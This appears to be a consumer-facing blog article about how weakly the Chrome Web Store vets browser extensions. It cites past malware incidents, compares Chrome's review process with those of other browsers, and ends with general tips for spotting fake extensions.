By definition, browser extensions can access some very sensitive data: your passwords, browsing history, and the very content of all the websites you visit. Recently, Jack was looking for a reading mode extension for Chrome, and together we realized that the Chrome Web Store is still very much like the Wild West—or at least it seems like it.
Sure, we read a lot about web security in general, but for today, we’ll take a closer look at browser extensions. Overall, there’s been some progress, but for now I’ll just say this: Even though they come through an official store, compared to mobile apps, you still have to be much more wary of random extensions you find on the Chrome Web Store. After looking at the guidelines and review process, it became clear it’s not as secure as we should want it to be.
(Editor's note: I have since covered Duo's free-to-use tool called the CRXcavator, which helps determine how safe Chrome extensions are. Additionally, Google released their Chrome Browser Cloud Management to help admins manage extensions.)
So what’s the reality?
A simple Google search shows just how pervasive malware has been over the years on the Chrome Web Store, even for extensions, and that Google has been slow to respond to issues.
In 2015, Google eliminated the ability to install extensions from outside the Chrome Web Store. Yet, that barely impeded developers’ abilities to get malware to users. So far, through June 2018, over 20 million Chrome users have become victims of fake ad blockers on the store, often parading around with nearly identical names to legitimate ones, duping users not looking carefully at what they’re installing. Additionally, another 100,000 users were exposed to extensions designed to steal data and mine cryptocurrency in March through an exploit in the Nigelify extension.
Also, a once-legitimate extension could get sold by the original developer to a third party that might not have your best interests at heart. The new owner can quietly modify the extension; usually it’s done to inject ads and sponsored links into your browser.
Why is it easy to get a harmful extension into the Chrome Web Store?
It doesn’t take much to get an extension onto the Chrome Web Store. Once you’ve developed one, log into any Google account, pay a $5 registration fee, and you’re ready to go. Then, you just upload your extension for Google to do an automated review of the extension. And in nearly all cases, that’s it. (Sometimes an extension might require a manual review over program policy issues.)
Google has extensive documentation about what developers should do with their extensions and keeping users safe, but they just need to beat the automated review. And if an extension with malware is discovered in the store? Too often it takes online publications making a stink before Google lumbers into action and pulls it down (and removes it from Chrome users who downloaded the harmful extension).
One way malicious extensions got around the review process is by downloading the payload after initial installation from the Chrome Web Store, so that it’s not contained within the shipped version. This was a vulnerability back in 2016; it isn’t clear if Google ever patched it or not. They say it’s not allowed, but I can’t find any evidence to show that you can’t still simply still do it anyway.
Though we’re beating up Google a bit in this article about their slow response time and lack of human review, that doesn’t mean they haven’t done anything to try and make extensions safer. You used to be able to install extensions directly from any third-party website. But, in 2015, Google required all extensions to be hosted in the Chrome Web Store. Then, the company officially deprecated inline installation altogether in 2018, in a three-phase rollout currently in progress.
To Google’s credit, Chrome extensions do require the concept of permissions before installing, giving users a chance to see how much access a specific extension requires. Some permissions include: reading and changing your browser history, reading and changing all your data on websites you visit, capturing on-screen content, and detecting your location. Other browsers don’t do this, with all Firefox extensions having full access, for example. It would be interesting if Google brought over granular permissions model used on Android to Chrome, allowing users more control over extensions.
Is this an issue across all major browsers with extensions?
To get an extension (or Add-On) in their marketplace, Firefox requires developers submit the source code for administrators to review. (Update: WebExtensions are computer reviewed, while AMOs still receive human reviews.)
Safari used to allow inline Safari extensions, but has since moved to a much more locked down experience, akin to submitting an app for the App Store (review process documentation) or the Extensions Gallery (which is closing down with Safari 12 on the way).
Microsoft’s newer browser remains the most strict when it comes to extensions. It’s very locked down and requires express permission from Microsoft before a developer can even submit an extension for manual review for eventual publishing to the Microsoft Store.
All extensions go through a review process and must be in the Opera Addons Catalog, but developers can include inline installation for approved/live extensions.
Conclusion: Be cautious, be wary
While the Chrome Web Store isn’t as safe or patrolled as it should be, that doesn’t mean it’s unusable. To stay safe, just do all the standard things you would do when checking for malware or phishing. Double check the extension name is correct, know the exact spelling and capitalization style of the legit extension; read through the description for weird spelling or grammatical issues; and check for positive and/or fake reviews. Don’t download just any extension—be sure you know what you’re downloading and giving permissions to.
The Chrome Web Store isn’t the Wild West, but extensions aren’t as closely reviewed as they should be. If Apple, Microsoft, and Mozilla can ensure all extensions go before a human reviewer, why can’t Google? Systems can be easily fooled (not that humans are infallible, either). I mean, have we learned nothing?